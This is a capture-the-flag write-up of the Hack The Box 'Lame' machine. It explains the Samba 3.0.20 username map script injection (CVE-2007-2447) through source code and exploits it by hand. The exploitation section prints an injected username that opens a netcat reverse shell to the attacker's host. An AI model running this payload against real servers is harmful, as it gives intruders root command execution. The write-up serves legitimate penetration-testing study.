Box 8: HTB - Lame

Lame is a beginner level machine and was the first machine published on Hack The Box, often the first machine for new users prior to its retirement.

Victor Le
6 min readDec 16, 2021

Enumeration

In the beginning, let’s start with Nmap scanner.

nmap -sV -n -vv -Pn -T4 -p- -A 10.10.10.3 --open

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4–1ubuntu4))

At first glance, we can see that we can login to FTP service on this box without username or password (anonymous login).

FTP anonymous login

I could log in to this FTP sever successfully, but found that there’s nothing left here to utilize. Maybe this is the place where we can upload execution code/malicious files later. I hope so.

Next, i tried to check with SSH service, but cannot log in with anonymous → Skip temporarily.

Next, move to the SMB service, I can log in anonymous successfully with this one.

Check the directory:

smbclient \\\\10.10.10.3\\tmp

Oops, I found a mess. Really didn’t know how useful this mess indicated.

I actually downloaded all of these and read the content of them, but there’s no result found.

CVE: 2011-2523

Try using searchsploit with the 1st service: vsftp 2.3.4

searchsploit vsftpd 2.3.4

Related CVE-2011-2523, Vsftpd version 2.3.4 does have a built-in backdoor, however it is not exploitable in this instance. This is an example of rabbit holes that you’ll surely encounter in OSCP exam 😄

How to exploit vsftpd 2.3.4

Code Python: https://www.exploit-db.com/exploits/49757

Code Ruby: https://www.exploit-db.com/exploits/17491

Vulnerability Explanation

How to exploit SMB 3.0.20:

CVE-2007–2447: https://www.exploit-db.com/exploits/16320

CVE-2007–2447 allows remote attackers to run commands via the username parameter in Samba 3.0.20 - 3.0.25rc3. Below is the POC seen in most scripts.

/=`nohup {payload}`

You can find most of those old version source code from Index of /pub/samba/stable

It’s a fairly big project, so difficult for us to browse through all the files by hand. After a bit of investigation I found two files that are important to look at:

  • source/lib/smbrun.c
  • source/smbd/map_username.c

Looking into map_username.c we find this little blob of code.

map_username.c

From this we can see that it’s just putting the username that we provided, then it will be combined with the script that is set in the smb.conf file to give us a string such as . Variable cmd in this case is /etc/samba/scripts/mapusers.sh as set by the config file. For more details about smb.conf file, you can visit here: https://www.samba.org/samba/docs/current/man-html/smb.conf.5.html

→ Go to section: username map script and username map

After that, that string is then sent to the smbrun() function. Let’s take a look at smbrun() function in smbrun.c, the smbrun() function sent unsanitized data to the execl() function.

Browsing through the code above this, it’s very clear that the cmd variable is never sanitized. So user (our input) gets put directly into cmd, then cmd gets tossed directly into execl(). This is the root cause of our vulnerability. A normal logon request would look like this to execl():

/bin/sh sh -c /etc/samba/scripts/mapscript.sh "Jimmy"

However if we were to inject the username with our exploit, this is what would be passed to execl(). That’ll give us command execution via:

/bin/sh -c /etc/samba/scripts/mapscript.sh "`nohup {payload}`"

About execl() function, the exec family has many functions in C. These C functions are basically used to run a system command in a separate process that the main program and print the output. More details can you found here: https://linuxhint.com/exec_linux_system_call_c/

The key part is in this exploitation at the bottom. It is creating an SMB session using:

  • username = /=`nohup [payload]`
  • password = randomly or null
  • domain = discretionary user provided domain

So basically on Linux, ` ` are used to execute and put the output in place, just like $(). It’s very similar to the backticks ``. They’re called command substitution (posix specification) and it invokes a subshell. The command in the braces of $() or between the backticks (`…`) is executed in a subshell and the output is then placed in the original command.

Marginal note, unlike backticks `…`, the $(…) form can be nested. So you can use command substitution inside another substitution.

It seems Samba is allowing that to happen inside the username. The exploitation is calling nohup (which starts the process outside the current context) and then a payload.

Cool! So a relatively simple exploit. We abuse backticks in unsanitized text that is passed to sh to gain command execution. But what happened to the forward slash? Long story short, the “/” acts as a delimiter for the domain field in smbclient. Below is a side by side comparison of an attempt to run this exploit with and without the “/” (Left without the “/”, right with the “/”)

Credit: https://0x00sec.org/t/cvexplained-cve-2007-2447/22748

Exploitation

To exploit this vulnerability, you can automate this task by MSF, or searchsploit and then launch the available script from here:

searchsploit samba 3.0.20

If you want to exploit it manually, keep going…

With the vulnerability explanation as above, all we have to do is sending a reverse shell command in the username parameter and catching the shell with nc. Let’s test it!

Send the payload in the username field with smbclient tool:

smbclient //10.10.10.3/tmp -U "./=`nohup nc -e /bin/sh 10.10.14.7 8080`"

Payload sent

Ensuring my listener is on to catch it:

nc -lvnp 8080

Catching the shell

I do get a shell, but it turns out to be my own machine. I actually don’t know the reason.

Btw, for anyone who don’t know about smbclient tool, kindly reach this article for instruction to use smbclient and all about its valid commands: https://www.samba.org/samba/docs/current/man-html/smbclient.1.html

Another way to login SMB is by using logon command in the smb:\> prompt.

Payload sent once again

Ensuring my listener is on to catch the shell:

nc -lvnp 8080

Catching the shell

Yup!! 🙌 I got the reverse shell under root privilege successfully.

The final mission for us is spawning an interactive shell with Python and fetching the content of root flag.

root.txt

Finally, I end the 8th box here on my journey to study OSCP. All comments and criticisms from you will help me make much progress. It gonna be a long road ahead 💪

THANKS FOR READING AND SUPPORTING!!

--

--